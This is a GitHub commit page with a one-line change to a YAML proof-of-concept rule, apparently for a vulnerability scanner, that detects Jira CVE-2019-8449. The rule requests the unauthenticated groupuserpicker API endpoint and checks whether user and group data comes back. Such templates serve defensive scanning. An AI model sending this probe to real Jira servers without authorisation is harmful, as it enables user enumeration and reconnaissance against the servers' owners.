We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 352e142 commit 03de60aCopy full SHA for 03de60a
pocs/jira-cve-2019-8449.yml
@@ -3,7 +3,7 @@ rules:
3
- method: GET
4
path: /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false
5
expression: |
6
- response.status == 200 && response.content_type.icontains("json") && "X-AREQUESTID" in response.headers && response.body.bcontains(b"total") && response.body.bcontains(b"groups") && response.body.bcontains(b"header") && response.body.bcontains(b"users")
+ response.status == 200 && response.content_type.icontains("json") && response.headers["X-AREQUESTID"] != "" && response.body.bcontains(b"total") && response.body.bcontains(b"groups") && response.body.bcontains(b"header") && response.body.bcontains(b"users")
7
detail:
8
author: MaxSecurity(https://github.com/MaxSecurity)
9
links:
0 commit comments